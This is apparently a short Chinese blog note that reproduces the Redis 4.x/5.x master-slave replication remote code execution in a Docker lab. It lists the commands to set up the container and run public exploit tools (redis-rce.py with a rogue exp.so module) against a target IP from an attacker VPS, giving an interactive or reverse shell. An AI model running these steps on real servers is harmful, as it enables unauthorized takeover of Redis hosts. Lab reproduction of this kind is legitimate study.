Redis基於主從複製的RCE 4.x/5.x 復現

• 2019 年 12 月 15 日
• 筆記

0x00 前言

又是一個RCE，很是享受這種拿shell的感覺，不知道你有沒有？最近發現docker確實是個好東西，有了它復現真是節省了不少時間，開始復現

0x01 拉取鏡像

首先拉取一個5.0鏡像

docker search redis5.0    //查找鏡像  docker pull damonevking/redis5.0   //拉取下圖第三個鏡像

0x02 運行環境

運行容器

docker run -p 6379:6379 -d damonevking/redis5.0 redis-server   //映射埠並運行容器

訪問你的ip+6379埠，如下圖則說明搭建成功

0x03 漏洞利用

git clone https://github.com/Ridter/redis-rce.git   //下載漏洞利用腳本

注意，這裡少一個.so的文件，到https://github.com/n0b0dyCN/redis-rogue-server下載並放到和redis-rce.py同一目錄下，然後執行如下命令：

python3 redis-rce.py -r 136.244.70.243（目標ip) -L 136.244.70.243（自己的vps） -f exp.so   //ip就不打碼了，師傅們不要搞我

需要注意，這裡的-r後面是目標的ip，而-L後面則是你執行腳本的vps的ip

在此處：i為互動式shell，r為反彈shell，根據自己的需要選擇就可以了

參考鏈接：

https://github.com/Ridter/redis-rce

https://github.com/n0b0dyCN/redis-rogue-server

https://www.cnblogs.com/mrhonest/p/11162735.html